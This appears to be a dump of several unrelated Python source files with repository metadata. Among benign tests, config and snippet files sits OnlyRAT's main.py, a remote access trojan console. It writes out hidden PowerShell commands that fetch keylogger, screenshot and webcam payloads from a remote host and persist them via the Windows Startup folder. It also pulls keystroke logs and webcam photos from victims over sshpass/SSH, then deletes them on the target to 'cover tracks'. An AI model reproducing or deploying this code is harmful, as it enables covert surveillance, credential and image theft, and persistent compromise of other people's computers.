npt.assert_allclose(coords._y, y, atol=1e-15)
npt.assert_allclose(coords._z, z, atol=1e-15)
def test_coordinates_init_from_array_spherical():
rad = [1., 1., 1., 1.]
ele = [np.pi/2, np.pi/2, 0, np.pi/2]
azi = [0, np.pi/2, 0, np.pi/4]
points = np.array([rad, ele, azi])
coords = Coordinates.from_array(points, coordinate_system='spherical')
npt.assert_allclose(coords.radius, rad, atol=1e-15)
npt.assert_allclose(coords.elevation, ele, atol=1e-15)
npt.assert_allclose(coords.azimuth, azi, atol=1e-15)
def test_coordinates_init_from_array_cartesian():
x = [1, 0, 0, 0]
y = [0, 1, 0, 0]
z = [0, 0, 1, 0]
points = np.array([x, y, z])
coords = Coordinates.from_array(points)
npt.assert_allclose(coords._x, x, atol=1e-15)
npt.assert_allclose(coords._y, y, atol=1e-15)
npt.assert_allclose(coords._z, z, atol=1e-15)
def test_getter_x():
x = np.array([1, 0], dtype=np.double)
coords = Coordinates()
coords._x = x
npt.assert_allclose(coords.x, x)
def test_getter_y():
y = np.array([1, 0], dtype=np.double)
coords = Coordinates()
coords._y = y
npt.assert_allclose(coords.y, y)
def test_getter_z():
z = np.array([1, 0], dtype=np.double)
coords = Coordinates()
coords._z = z
npt.assert_allclose(coords.z, z)
def test_setter_x():
value = np.array([1.0, 1], dtype=np.double)
coords = Coordinates()
coords.x = value
npt.assert_allclose(value, coords._x)
def test_setter_y():
value = np.array([1.0, 1], dtype=np.double)
coords = Coordinates()
coords.y = value
npt.assert_allclose(value, coords._y)
def test_setter_z():
value = np.array([1.0, 1], dtype=np.double)
coords = Coordinates()
coords.z = value
npt.assert_allclose(value, coords._z)
def test_getter_ele():
value = np.pi/2
coords = Coordinates()
coords.z = 0
coords.y = 0
coords.x = 1
npt.assert_allclose(coords.elevation, value)
def test_getter_radius():
value = 1
coords = Coordinates()
coords.z = 0
coords.y = 1
coords.x = 0
npt.assert_allclose(coords.radius, value)
def test_getter_azi():
azi = np.pi/2
coords = Coordinates()
coords.z = 0
coords.y = 1
coords.x = 0
npt.assert_allclose(coords.azimuth, azi)
def test_setter_rad():
eps = np.spacing(1)
rad = 0.5
x = 0.5
y = 0
z = 0
coords = Coordinates(1, 0, 0)
coords.radius = rad
npt.assert_allclose(coords._x, x, atol=eps)
npt.assert_allclose(coords._y, y, atol=eps)
npt.assert_allclose(coords._z, z, atol=eps)
def test_setter_ele():
eps = np.spacing(1)
ele = 0
x = 0
y = 0
z = 1
coords = Coordinates(1, 0, 0)
coords.elevation = ele
npt.assert_allclose(coords._x, x, atol=eps)
npt.assert_allclose(coords._y, y, atol=eps)
npt.assert_allclose(coords._z, z, atol=eps)
def test_setter_azi():
eps = np.spacing(1)
azi = np.pi/2
x = 0
y = 1
z = 0
coords = Coordinates(1, 0, 0)
coords.azimuth = azi
npt.assert_allclose(coords._x, x, atol=eps)
npt.assert_allclose(coords._y, y, atol=eps)
npt.assert_allclose(coords._z, z, atol=eps)
def test_getter_latitude():
x = 1
y = 0
z = 0.5
height, lat, lon = cart2latlon(x, y, z)
coords = Coordinates(x, y, z)
npt.assert_allclose(coords.latitude, lat)
def test_getter_longitude():
x = 1
y = 0
z = 0.5
height, lat, lon = cart2latlon(x, y, z)
coords = Coordinates(x, y, z)
npt.assert_allclose(coords.longitude, lon)
def test_getter_cartesian():
x = [1, 0, 0, 0]
y = [0, 1, 0, 0]
z = [0, 0, 1, 0]
coords = Coordinates(x, y, z)
ref = np.vstack((x, y, z))
npt.assert_allclose(coords.cartesian, ref)
def test_setter_cartesian():
x = np.array([1, 0, 0, 0])
y = np.array([0, 1, 0, 0])
z = np.array([0, 0, 1, 0])
cart = np.vstack((x, y, z))
coords = Coordinates()
coords.cartesian = cart
npt.assert_allclose(coords.cartesian, cart)
def test_getter_spherical():
x = np.array([1, 0, 0, 1], dtype=np.float64)
y = np.array([0, 1, 0, 1], dtype=np.float64)
z = np.array([0, 0, 1, 1], dtype=np.float64)
rad, theta, phi = cart2sph(x, y, z)
coords = Coordinates(x, y, z)
ref = np.vstack((rad, theta, phi))
npt.assert_allclose(coords.spherical, ref)
def test_setter_spherical():
eps = np.spacing(1)
x = np.array([1, 0, 0, 1], dtype=np.float64)
y = np.array([0, 1, 0, 1], dtype=np.float64)
z = np.array([0, 0, 1, 1], dtype=np.float64)
rad, theta, phi = cart2sph(x, y, z)
spherial = np.vstack((rad, theta, phi))
coords = Coordinates()
coords.spherical = spherial
npt.assert_allclose(coords._x, x, atol=eps)
npt.assert_allclose(coords._y, y, atol=eps)
npt.assert_allclose(coords._z, z, atol=eps)
def test_n_points():
coords = Coordinates([1, 0], [1, 1], [0, 1])
assert coords.n_points == 2
def test_find_nearest():
coords = Coordinates([1, 0], [1, 1], [0, 1])
point = Coordinates(1, 1, 0)
dist, idx = coords.find_nearest_point(point)
assert idx == 0
def test_len():
coords = Coordinates([1, 0], [1, 1], [0, 1])
assert len(coords) == 2
def test_getitem():
coords = Coordinates([1, 0], [1, 1], [0, 1])
getcoords = coords[0]
npt.assert_allclose(np.squeeze(getcoords.cartesian), np.array([1, 1, 0]))
def test_setitem():
coords = Coordinates([0, 0], [1, 1], [0, 1])
setcoords = Coordinates(1, 1, 0)
coords[0] = setcoords
npt.assert_allclose(np.squeeze(coords.cartesian),
np.array([[1, 0], [1, 1], [0, 1]]))
def test_sampling_sphere_init():
sampling = SamplingSphere()
assert isinstance(sampling, SamplingSphere)
def test_sampling_sphere_init_value():
sampling = SamplingSphere(1, 0, 0, 0)
assert isinstance(sampling, SamplingSphere)
def sampling_cube():
"""Helper function returning a cube sampling"""
x = [1, -1, 0, 0, 0, 0]
y = [0, 0, 1, -1, 0, 0]
z = [0, 0, 0, 0, 1, -1]
return x, y, z
def test_getter_n_max():
x, y, z = sampling_cube()
n_max = 1
sampling = SamplingSphere(x, y, z, n_max)
assert sampling.n_max == n_max
def test_setter_n_max():
x, y, z = sampling_cube()
n_max = 1
sampling = SamplingSphere(x, y, z, 0)
sampling.n_max = n_max
assert sampling._n_max == n_max
def test_merge():
s1 = Coordinates(1, 0, 0)
s2 = Coordinates(0, 2, 0)
s1.merge(s2)
truth = np.array([[1, 0], [0, 2], [0, 0]])
npt.assert_allclose(truth, s1.cartesian)
| 25.016026 | 77 | 0.626393 | 1,219 | 7,805 | 3.869565 | 0.093519 | 0.017808 | 0.147763 | 0.170659 | 0.664405 | 0.556286 | 0.49841 | 0.45707 | 0.389018 | 0.351495 | 0 | 0.04739 | 0.226778 | 7,805 | 311 | 78 | 25.096463 | 0.734217 | 0.01704 | 0 | 0.444915 | 0 | 0 | 0.006654 | 0 | 0 | 0 | 0 | 0 | 0.211864 | 1 | 0.152542 | false | 0 | 0.025424 | 0 | 0.182203 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2591028d9fa27e5f6e75b62f0ecb5005aedac84 | 18,397 | py | Python | main.py | CosmodiumCS/OnlyRAT | deb7ed6b99788cacc420461fc0e72072a470d258 | [
"BSD-3-Clause"
] | 21 | 2022-01-07T20:20:10.000Z | 2022-03-28T20:55:07.000Z | main.py | CosmodiumCS/OnlyRAT | deb7ed6b99788cacc420461fc0e72072a470d258 | [
"BSD-3-Clause"
] | 3 | 2022-02-07T02:59:22.000Z | 2022-03-01T22:34:45.000Z | main.py | CosmodiumCS/OnlyRAT | deb7ed6b99788cacc420461fc0e72072a470d258 | [
"BSD-3-Clause"
] | 3 | 2022-02-01T13:49:13.000Z | 2022-02-09T05:48:47.000Z | #!/usr/bin/python
# python console for OnlyRAT
# created by : C0SM0
# imports
import os
import sys
import getpass
import random as r
from datetime import datetime
# banner for display
banner = """
_;,
,,=-,--,,__ _,-;:;;},,,_
_,oo, Ll _,##&&&&$$&&$$$&-=;%%^%&;v:&& @ `=,_
,oO" `0} Ll ,%#####&#>&&$$$$&$$$&,&'$$#`"%%;,,,*%^<}
_,--O;_, 0_ Ll ,%%%%%&%-#&###$$"$$$$$*;&&$,#;%^*%$$^{,%;'
,cC'oO`'CC ,OnnNNNNn, Ll YY, ,%#&%%$$$$%%%%%##&&^$%^%&&&$$'&#,-%%--"'
,CCCO" `C ,0`Nn` `Nn Ll YY, ,;;##&,$$$$$$$;,%%%&&%%%&&&&&&$$%%'
{CC{ ,0' NN NN Ll Yy yY';#&,#,$$$$$%%%%%%%%&%%%&&&&&&%%`
CCC( _o0 NN NN Ll YyyY ,;&##&###%%$$%&&%%%%#^%^&&&&&%{`
,OCC{ ,0C NN NN Ll YY ;#&&#####&%;%&&,%%%%#%=%%%&^%%
,O`'"Cc_.o0cC NN NN Ll y, YY ;&&&^##&&&$%&&&%%%"` `%%%%
o0 _o0"` '` NN NN Ll Yy,yYY '^%%&VGh%%%%%&&"^%_,, "%%%,_ _,.,_
0o,_,oo0" NN NN Ll `YyY` ``'"lIG9ubHkg,,""''` ""%%>_,;VyIG5lZ;,
"00O"` ``'``""UkFUIHlvdSdsbCBldm;" `"WQ=,
"""
# _..----.._ _
# .' .--. "-.(0)_
# '-.__.-'"'=:| , _)_ \\__ . c\\'-..
# '''------'---''---'-"
# :::::::: :::: ::: ::: ::: ::: ::::::::: ::: :::::::::::
# :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
# +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
# +#+ +:+ +#+ +:+ +#+ +#+ +#++: +#++:++#: +#++:++#++: +#+
# +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ +#+
# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
# ######## ### #### ########## ### ### ### ### ### ###
# [::] The Only RAT You'll Ever Need [::]
# [::] Created By : Blue Cosmo [::]
# help menu
help_menu = """
[+] Arguments:
<username>.rat = configuration file
[+] Example:
onlyrat bluecosmo.rat
"""
# option menu
options_menu = """
[+] Command and Control:
[orconsole] ------ Remote Console
[fix orconsole] -- Fix Remote Console
[upload] --------- Upload File
[downlaod] ------- Download File
[restart] -------- Restart Target PC
[shutdown] ------- Shutdown Target PC
[killswitch] ----- Removes OnlyRAT From Target
[+] Reconnaissance:
[install keylogger] ------ Install Keylogger
[install screencapture] -- Install ScreenCapture
[install webcam] --------- Install WebCam Capture
[grab keylogs] ----------- Grab Keylogs
[grab screenshots] ------- Grab ScreenShots From ScreenCapture
[grab webcam] ------------ Grab WebCam Photos
[+] Options:
[help] ------- Help Menu
[man] -------- Onlyrat Manual
[config] ----- Display RAT File
[version] ---- Version Number
[update] ----- Update OnlyRAT
[uninstall] -- Uninstall OnlyRAT
[quit] ------- Quit
* any other commands will be
sent through your terminal
[*] Select an [option]...
"""
username = getpass.getuser() # gets username
header = f"[~] {username}@onlyrat $ " # sets up user input interface
remote_path = "raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main" # url path for OnlyRAT files
local_path = f"/home/{username}/.OnlyRAT" if username != "root" else "/root/.OnlyRAT" # gets path of OnlyRAT
# random text generator for obfuscation
def random_text():
lower_case = "abcdefghijklmnopqrstuvwxyz"
upper_case = "abcdefghijklmnopqrstuvwxyz".upper()
characters = lower_case + upper_case
generated_text = ""
for i in range(10):
generated_text += r.choice(list(characters))
return generated_text
# read config file
def read_config(config_file):
configuration = {}
# get file contents
read_lines = open(config_file, "r").readlines()
# get target configurations
configuration["IPADDRESS"] = read_lines[0].strip()
configuration["PASSWORD"] = read_lines[1].strip()
configuration["WORKINGDIRECTORY"] = (read_lines[2]).replace("\\", "/").strip()
configuration["STARTUPDIRECTORY"] = (read_lines[3]).replace("\\", "/").strip()
return configuration
# display configuration file data
def print_config(configuration):
for key, value in configuration.items():
print(f"{key} : {value}")
# clear screen
def clear():
os.system("clear")
# terminates program
def exit():
print("\n[*] Exiting...")
sys.exit()
# gets current date and time
def current_date():
current = datetime.now()
return current.strftime("%m-%d-%Y_%H-%M-%S")
# connects rat to target
def connect(address, password):
print("\n [*] Connecting to target...")
# remotely connect
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address}")
# remote uploads with SCP
def remote_upload(address, password, upload, path):
print("\n[*] Starting Upload...")
# scp upload
os.system(f"sshpass -p \"{password}\" scp {upload} onlyrat@{address}:{path}")
print("[+] Upload complete\n")
# remote download with SCP
def remote_download(address, password, path):
print("\n[*] Starting Download...")
# scp download
os.system("mkdir ~/Downloads")
os.system(f"sshpass -p \"{password}\" scp -r onlyrat@{address}:{path} ~/Downloads")
print("[+] Download saved to \"~/Downloads\"\n")
# run commands remotely with SCP
def remote_command(address, password, command):
# remote command execution
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address} '{command}'")
# keylogger
def keylogger(address, password, username, working):
print("\n[*] Prepping keylogger...")
# web requests
keylogger_command = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/keylogger.ps1 -OutFile {working}/KHRgMHYmdT.ps1\""
controller_command = f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/KHRgMHYmdT.ps1 >> GiLqXiexKP.cmd"
print("[+] Keylogger prepped")
# installing keylogger
print("[*] Installing keylogger...")
remote_command(address, password, keylogger_command)
print("[*] Installing controller...")
remote_command(address, password, controller_command)
print("[+] Keylogger installed sucessfully\n")
# execute logger
print("\n[!] Restart target computer to execute")
# takes screenshots off of target
def grab_screenshots(address, password, working, username):
# download screenshot
print("\n[*] Downloading screenshots...")
screenshot_location = f"{working}/amETlOMhPo"
remote_download(address, password, screenshot_location)
print("[+] Screenshots downloaded")
# formatting screenshots
print("[*] Fromatting screenshots...")
loot_folder = f"screenshots-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/amETlOMhPo")
print("[+] Screenshots formatted")
# deletes screenshots off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/amETlOMhPo/*"
remote_command(address, password, delete_screenshots)
print("[+] Screenshots downloaded")
# confirmation
print("\n[+] Screenshots downloaded to \"~/Downloads\"\n")
# takes webcam pictures off of target
def grab_webcam(address, password, working, username):
# download webcam photos
print("\n[*] Downloading webcam photos...")
screenshot_location = f"{working}/bNOEXCxyVp"
remote_download(address, password, screenshot_location)
print("[+] Photos downloaded")
# formatting webcam photos
print("[*] Fromatting photos...")
loot_folder = f"webcam-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/bNOEXCxyVp")
print("[+] Photos formatted")
# deletes photos off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/bNOEXCxyVp/*.bmp"
remote_command(address, password, delete_screenshots)
print("[+] Photos downloaded")
# confirmation
print("\n[+] Photos downloaded to \"~/Downloads\"\n")
# killswitch
def killswitch(address, password, working, username):
print("\n[*] Prepping killswitch...")
# web requests
killswitch_command = f"powershell /c cd C:; Remove-Item {working}/* -r -Force; Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Remove-Item \"C:/Users/onlyrat\" -r -Force; Remove-LocalUser -Name \"onlyrat\"; shutdown /r"
print("[+] Killswitch prepped")
# installing killswitch
print("[*] Executing killswitch...")
remote_command(address, password, f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && del GiLqXiexKP.cmd")
remote_command(address, password, killswitch_command)
print("[+] Killswitch Executed sucessfully\n")
# execute logger
print("\n[*] Restarting target computer...")
# custom upload
def upload(address, password, working):
# get upload file
print("\n[~] Enter file you wish to upload :")
upload_file = input(header)
# upload file
print("\n[*] Uploading...")
remote_upload(address, password, upload_file, working)
print(f"[+] Uploaded sucessfully to \"{working}\"\n")
# custom download
def download(address, password):
# get download path
print("\n[~] Enter path of file you wish to download :")
download_file = input(header)
# download file
print("\n[*] Downloading...")
remote_download(address, password, download_file)
# update OnlyRAT
def update():
print("\n[*] Checking for updates...")
# get latest version nubmer
os.system(f"curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt")
# save version nubmers to memory
current_version = float(open(f"{local_path}/version.txt", "r").read())
latest_version = float(open(f"{local_path}/latest.txt", "r").read())
# remove version number file
os.system("rm -rf ~/.OnlyRAT/latest.txt")
# if new version is available, update
if latest_version > current_version:
print("\n[+] Update found")
print("[~] Update Onlyrat? [y/n]\n")
# user input, option
option = input(f"{header}")
# update
if option == "y":
os.system(f"sh ~/.OnlyRAT/payloads/update.sh")
# exception
else:
main()
# otherwise, run main code
else:
print("\n[+] OnlyRAT already up to date")
print("[*] Hit any key to continue...\n")
input(header)
main()
# uninstalls onlyrat
def remove():
# confirmation
print("\n[~] Are you sure you want to remove OnlyRAT [y/n]\n")
# user input
option = input(header)
# delete OnlyRAT
if option == "y":
os.system("rm -rf ~/.OnlyRAT")
# cancel
if option == "n":
main()
# listener
def listener():
pass
# command line interface
def cli(arguments):
# display banner
clear()
# listener
# if sys.argv[1] == "listener":
# listener()
print(banner)
# if arguments exist
if arguments:
print("\t[~] Type \"help\" for help menu :\n")
# loop user input
while True:
# user input, option
option = input(header)
# check if configuration file exists
try:
configuration = read_config(sys.argv[1])
except FileNotFoundError:
print("\n[!!] File does not exist")
exit()
# get config info
ipv4 = configuration.get("IPADDRESS")
password = configuration.get("PASSWORD")
working_direcory = configuration.get("WORKINGDIRECTORY")
startup_direcory = configuration.get("STARTUPDIRECTORY")
target_username = working_direcory[9:-19]
# remote console
if option == "orconsole":
connect(ipv4, password)
# fix remote console
if option == "fix orconsole":
os.system(f"sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}")
# keylogger option
elif option == "install keylogger":
keylogger(ipv4, password, target_username, working_direcory)
# grab keylogs option
elif option == "grab keylogs":
remote_download(ipv4, password, f"{working_direcory}/{target_username}.log")
remote_command(ipv4, password, f"powershell New-Item -Path {working_direcory}/{target_username}.log -ItemType File -Force")
print("[+] Log file saved to \"~/Downloads\"")
print("[+] Log file on target has been wiped\n")
# installs screen capture option
elif option == "install screencapture":
print("\n[*] Installing screen capture...")
install_screencaputre = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/screenshot.ps1 -OutFile {working_direcory}/SbQRViPjIq.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/SbQRViPjIq.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_screencaputre)
remote_command(ipv4, password, add_to_startup)
print("[+] ScreenCapture installed\n")
print("\n[!] Restart target computer to execute\n")
# grab screenshots option
elif option == "grab screenshots":
grab_screenshots(ipv4, password, working_direcory, target_username)
# custom upload
elif option == "upload":
upload(ipv4, password, working_direcory)
# custom download
elif option == "download" or option == "exfiltrate":
download(ipv4, password)
# restart target option
elif option == "restart":
remote_command(ipv4, password, "shutdown /r")
# shutdown target option
elif option == "shutdown":
remote_command(ipv4, password, "shutdown")
# install webcam option
elif option == "install webcam":
print("\n[*] Installing webcam capture...")
install_webcam = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/webcam.ps1 -OutFile {working_direcory}/bNOEXCxyVp/LIspiXrVAu.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell cd $env:temp/bNOEXCxyVp; Start-Process powershell.exe -windowstyle hidden $env:temp/bNOEXCxyVp/LIspiXrVAu.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_webcam)
remote_command(ipv4, password, add_to_startup)
print("[+] Webcam capture installed\n")
print("\n[!] Restart target computer to execute\n")
# grab webcam photos
elif option == "grab webcam":
grab_webcam(ipv4, password, working_direcory, target_username)
# help menu
elif option == "help":
print(banner)
print(options_menu)
# display config file info
elif option == "config":
print_config(configuration)
print(f"USERNAME : {target_username}")
# get version number
elif option == "version":
os.system(f"cat {local_path}/version.txt")
# update option
elif option == "update":
update()
exit()
# kill switch
elif option == "killswitch":
print("\n[~] Are you sure you want to remove OnlyRAT from your target [y/n")
confirm = input(header)
if confirm == "y":
killswitch(ipv4, password, working_direcory, target_username)
else:
main()
# onlyrat manual
elif option == "man" or option == "manual":
os.system(f"xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md")
# remove installation
elif option == "remove" or option == "uninstall":
remove()
# quit option
elif option == "quit" or option == "exit":
exit()
# exception
else:
os.system(option)
# new line for cleaner UI
print("\n")
# if arguments don't exist
else:
print(help_menu)
# main code
def main():
# clear screen
clear()
# checks for arguments
try:
sys.argv[1]
except IndexError:
arguments_exist = False
else:
arguments_exist = True
# run command line interface
cli(arguments_exist)
# runs main code
if __name__ == "__main__":
# runs main function
main() | 35.31094 | 290 | 0.556504 | 1,819 | 18,397 | 5.539307 | 0.202309 | 0.016078 | 0.013398 | 0.019452 | 0.275407 | 0.233029 | 0.201171 | 0.167527 | 0.1448 | 0.128325 | 0 | 0.004554 | 0.283851 | 18,397 | 521 | 291 | 35.310941 | 0.760228 | 0.152634 | 0 | 0.149826 | 0 | 0.020906 | 0.447832 | 0.094845 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0.156794 | 0.017422 | 0 | 0.101045 | 0.216028 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c25ba35db5bd64116bd38546b3ed9d907f3e15a6 | 296 | py | Python | review-sentiment/sentiment-backend/sentiment/config.py | aldeeb/xai-demonstrator | 45b600bd326923a21dc2c6e2659b58ab3c7b9bd4 | [
"Apache-2.0"
] | 8 | 2021-05-03T13:05:49.000Z | 2022-01-11T02:57:33.000Z | review-sentiment/sentiment-backend/sentiment/config.py | aldeeb/xai-demonstrator | 45b600bd326923a21dc2c6e2659b58ab3c7b9bd4 | [
"Apache-2.0"
] | 467 | 2021-01-22T16:58:56.000Z | 2022-03-28T11:15:09.000Z | review-sentiment/sentiment-backend/sentiment/config.py | aldeeb/xai-demonstrator | 45b600bd326923a21dc2c6e2659b58ab3c7b9bd4 | [
"Apache-2.0"
] | 8 | 2021-05-25T16:10:18.000Z | 2022-02-28T13:21:31.000Z | from pydantic import BaseSettings
class Settings(BaseSettings):
service_name: str = "sentiment-service"
root_path: str = ""
path_prefix: str = ""
# Explanation configuration
default_explainer: str = "integrated_gradients"
default_target: int = 4
settings = Settings()
| 21.142857 | 51 | 0.709459 | 31 | 296 | 6.580645 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004237 | 0.202703 | 296 | 13 | 52 | 22.769231 | 0.860169 | 0.084459 | 0 | 0 | 0 | 0 | 0.137546 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c25fb52a5f4ceebfdfc69c188bf075e9881ab1e6 | 383 | py | Python | python_libraries/numpy_lib.py | peter88tom/python_rebooted | 042ca1c3905816c809a724434a9d797a4de0dd61 | [
"MIT"
] | null | null | null | python_libraries/numpy_lib.py | peter88tom/python_rebooted | 042ca1c3905816c809a724434a9d797a4de0dd61 | [
"MIT"
] | null | null | null | python_libraries/numpy_lib.py | peter88tom/python_rebooted | 042ca1c3905816c809a724434a9d797a4de0dd61 | [
"MIT"
] | null | null | null | """
NumPy is a general-purpose-array-processing package.
It provide a high performance multidimensional array object,
"""
import numpy as np
# Creating array object
arr = np.array([[1, 2, 3],
[4, 2, 5]])
# Print type of array
print(f"Array is of type: {type(arr)}")
print(f"Size of array is: {arr.size}")
print(f"Shape of array is: {arr.shape}")
print(f"Number of")
| 23.9375 | 60 | 0.668407 | 64 | 383 | 4 | 0.484375 | 0.09375 | 0.070313 | 0.09375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019169 | 0.182768 | 383 | 15 | 61 | 25.533333 | 0.798722 | 0.407311 | 0 | 0 | 0 | 0 | 0.440367 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.571429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
c26195a4b33e7b336f66409294188c812f2b2c1e | 407 | py | Python | src/czml3/utils.py | idanmiara/czml3 | 0fec1e2b87cc84f4afa1e3c7b0354b1596caafb0 | [
"MIT"
] | null | null | null | src/czml3/utils.py | idanmiara/czml3 | 0fec1e2b87cc84f4afa1e3c7b0354b1596caafb0 | [
"MIT"
] | null | null | null | src/czml3/utils.py | idanmiara/czml3 | 0fec1e2b87cc84f4afa1e3c7b0354b1596caafb0 | [
"MIT"
] | null | null | null | from .properties import Color
def get_color(color):
# Color.from_string, Color.from_int, ...
if isinstance(color, str) and 6 <= len(color) <= 10:
return Color.from_str(color)
elif isinstance(color, int):
return Color.from_hex(color)
elif isinstance(color, list) and len(color) <= 4:
return Color.from_list(color)
else:
raise ValueError("Invalid input")
| 29.071429 | 56 | 0.653563 | 55 | 407 | 4.727273 | 0.454545 | 0.173077 | 0.173077 | 0.184615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012739 | 0.228501 | 407 | 13 | 57 | 31.307692 | 0.815287 | 0.093366 | 0 | 0 | 0 | 0 | 0.035422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c26778354005772e2aa996574f8a2003e99a4f80 | 764 | py | Python | blog/migrations/0005_auto_20180328_0653.py | leventaysan/My-first-project | cc9b3a5d55414dbb927fd74230d43122e08c3a03 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20180328_0653.py | leventaysan/My-first-project | cc9b3a5d55414dbb927fd74230d43122e08c3a03 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20180328_0653.py | leventaysan/My-first-project | cc9b3a5d55414dbb927fd74230d43122e08c3a03 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-03-28 06:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20180314_1027'),
]
operations = [
migrations.AddField(
model_name='post',
name='okunmasayisi',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='post',
name='link',
field=models.URLField(blank=True),
),
migrations.AlterField(
model_name='post',
name='video',
field=models.FileField(blank=True, upload_to='BlogVideo'),
),
]
| 24.645161 | 70 | 0.570681 | 76 | 764 | 5.578947 | 0.671053 | 0.063679 | 0.091981 | 0.120283 | 0.174528 | 0.174528 | 0 | 0 | 0 | 0 | 0 | 0.064272 | 0.307592 | 764 | 30 | 71 | 25.466667 | 0.73724 | 0.089005 | 0 | 0.347826 | 1 | 0 | 0.099567 | 0.033189 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2694f547c73f59688656a31c3d35127cbefd810 | 2,799 | py | Python | digest_csvs.py | jlcanovas/sourcecred-tooling | 4b52b7783db6c5be14b518035c57df9b64214f65 | [
"Apache-2.0"
] | null | null | null | digest_csvs.py | jlcanovas/sourcecred-tooling | 4b52b7783db6c5be14b518035c57df9b64214f65 | [
"Apache-2.0"
] | 2 | 2020-05-26T09:53:20.000Z | 2020-05-26T10:32:15.000Z | digest_csvs.py | jlcanovas/sourcecred-tooling | 4b52b7783db6c5be14b518035c57df9b64214f65 | [
"Apache-2.0"
